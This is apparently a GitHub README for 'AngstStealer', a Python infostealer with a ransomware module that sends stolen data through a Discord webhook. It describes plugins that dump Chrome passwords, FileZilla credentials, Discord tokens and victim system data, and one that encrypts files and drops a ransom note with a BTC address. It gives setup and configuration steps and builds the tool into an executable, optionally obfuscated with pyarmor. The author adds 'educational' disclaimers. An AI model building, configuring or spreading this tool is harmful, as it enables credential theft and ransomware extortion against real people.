AngstStealer is a POC malware which is designed to highlight and utilize Discord as an attack vector. While it is fully functioning it was created for educational purpose's, please do not use misuse this tool. Angst Stealer currently has a total of 6 plugins:
| Plugin | Description |
|---|---|
| Chrome | The chrome plugin dumps all of the users passwords, websites, and usernames. |
| Filezilla | Checks to see if the user has Filezilla installed, if they do then it dumps stored Filezilla creds. |
| Ransomware | Encrypts all files on the victims computer, drops a note also. |
| Discord | Dumps discord token for Chrome and Discord. |
| Send | Zips and sends all the files through the Discord webhook. |
| User | Drops userdata about the victim such as IP, Username and Computername. |
| Windows | Also drops the windows activation key for the victims computer. |
- Install python here
- Clone this repo using
git clone https://github.com/backslash/AngstStealeror manually download it. - Run
cd folderpathso that you are inside the directory itself. - Install the required libraries using
pip install -r requirements.txt - Inside the main file you will see a config template, modify it so it matches your requirements.
CONFIG = {
"webhook" : "",
"chrome" : True,
"filezilla":False,
"userdata":True,
"discord":True,
"ransomware" : {
"enabled" : False,
"target_dir" : "C:\\Users\\testuser", #remove the testuser at the end
"extenstion" : ".angst",
"btcAddy" : "",
"email" : "[email protected]"
}
}
webhook -> The discord webhook link which you want it to use.
chrome -> If it should include chrome passwords
filezilla -> Should it include possible saved filezilla passwords
userdata -> Give information about your victim
discord -> Steal discord tokens
ransomware -> If enabled is set to True then have enabled the ransomware module. The target_dir is the directory in which you want it to encrypt. The ransomware extenstion setting just sets the output file extenstion, in this case its just .angst. The btcAddy and email are just options which you can toss in to be included in the ransomware note.
6. Run one of the following commands listed below, it is worth noting that pyarmor will sometimes corrupt the executable so if you plan on using the pyarmor command you should test it locally to make sure it works.
PYINSTALLER: pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py
PYARMOR: pyarmor pack -e " --onefile --hidden-import=pkg_resources.py2_warn" angst.py
Here is a screenshot of what will be sent through the discord webhook once it is ran. The reason why not windows activation key is included is due to it being run inside a virtual machine thats not activated.
- Add cookie support (just got lazy and forgot)
- Add more browsers
- Implement some anti-vm tricks.
- Add more plugins
If you would like to help with something, writing plugins for Angst would be a pretty big help.
Use this responsibly, I made this just as a demonstration of a POC. The fact that Discord still hasn't implemented any safegaurds or preventive measures when it comes to something like this is kind've embarrasing. Regardless though, using this without the consent of the computer owner is illegal.
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent